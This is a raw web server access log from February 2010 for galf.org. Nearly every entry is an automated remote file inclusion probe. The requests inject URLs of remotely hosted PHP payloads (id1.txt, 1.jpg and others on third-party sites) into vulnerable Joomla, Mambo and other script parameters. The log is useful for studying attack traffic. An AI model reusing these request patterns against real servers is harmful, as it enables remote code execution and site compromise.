218.38.136.125 - - [07/Feb/2010:16:16:54 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:57 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:59 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:00 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:00 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:03 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:03 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:05 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:05 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:07 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:11 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:16 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:17 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:17 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:17 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:26 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:29 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:29 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:29 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:33 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:41 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:42 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:42 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:48 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:48 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:49 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:49 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:53 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:17:56 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:03 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:09 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:18:09 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:18:10 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:18:10 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:18 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:18 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:18:38 -0800] "GET /logs/access_090720.log%20%20////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:18:38 -0800] "GET ///?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:18:38 -0800] "GET /logs////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:40 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:44 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:18:45 -0800] "GET /logs/access_090921.log%20%20////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:18:47 -0800] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:48 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:18:50 -0800] "GET /logs/access_090713.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:19:08 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:08 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:08 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:09 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:19:11 -0800] "GET ///?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:19:11 -0800] "GET /logs/access_090720.log%20%20////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:19:11 -0800] "GET /logs////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:17 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:17 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:17 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:19:18 -0800] "GET /logs/access_090921.log%20%20////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:19:34 -0800] "GET /logs/access_091123.log%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:41 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:19:51 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:20:07 -0800] "GET /logs/access_100118.log%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:20:30 -0800] "GET /logs/access_100104.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:20:47 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:21:21 -0800] "GET /logs/access_100118.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:21:21 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:21:21 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:21:22 -0800] "GET /logs/access_100118.log///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:21:25 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:21:26 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:21:27 -0800] "GET /logs/access_100118.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:21:39 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:22:12 -0800] "GET /logs/access_090928.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:22:17 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:22:17 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:22:17 -0800] "GET /logs/access_100118.log///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:22:27 -0800] "GET /logs/access_090720.log////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:22:36 -0800] "GET /logs/access_090928.log///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:23:09 -0800] "GET /logs/access_090720.log////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
82.151.132.176 - - [07/Feb/2010:16:24:11 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Feb/2010:16:24:11 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Feb/2010:16:24:11 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Feb/2010:16:24:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Feb/2010:16:24:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
82.151.132.176 - - [07/Feb/2010:16:24:22 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.boucherielegrand.fr//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
66.103.128.44 - - [07/Feb/2010:16:27:10 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:27:10 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.103.128.44 - - [07/Feb/2010:16:27:10 -0800] "GET /logs/access_100118.log///?_SERVER[DOCUMENT_ROOT]=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.68.54 - - [07/Feb/2010:16:29:49 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.68.54 - - [07/Feb/2010:16:29:51 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.68.54 - - [07/Feb/2010:16:29:51 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:30:55 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:31:28 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:31:36 -0800] "GET /logs/access_090720.log//?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:31:36 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:31:36 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:31:53 -0800] "GET /logs/access_100118.log//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:31:53 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:31:53 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
88.191.80.44 - - [07/Feb/2010:16:32:00 -0800] "GET /logs/main.php?x=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
88.191.80.44 - - [07/Feb/2010:16:32:00 -0800] "GET /logs/access_090921.log%20/main.php?x=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
88.191.80.44 - - [07/Feb/2010:16:32:00 -0800] "GET /main.php?x=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.galf.org"
211.115.68.54 - - [07/Feb/2010:16:32:30 -0800] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:32:37 -0800] "GET /logs/access_090928.log//?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:33:01 -0800] "GET /logs/access_091123.log////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
122.201.102.68 - - [07/Feb/2010:16:33:09 -0800] "GET /logs/access_091123.log////?path[docroot]=http://bookbinding.kr/bbs/data/egallery/1211162836/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:34:04 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:34:04 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:34:07 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:34:27 -0800] "GET /logs/access_100201.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:35:34 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:35:34 -0800] "GET /?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:35:34 -0800] "GET /logs/access_091228.log//?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
194.1.150.2 - - [07/Feb/2010:16:35:38 -0800] "GET /logs/access_091221.log//?_REQUEST=&_REQUEST[option]=com_mambatstaff&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.4.44 - - [07/Feb/2010:16:36:05 -0800] "GET /logs/access_100111.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.68.4.44 - - [07/Feb/2010:16:36:05 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:36:07 -0800] "GET /logs/access_090907.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:16:38:17 -0800] "GET /?index.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:16:38:18 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:16:38:18 -0800] "GET /logs/access_090803.log%20%20//?index.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
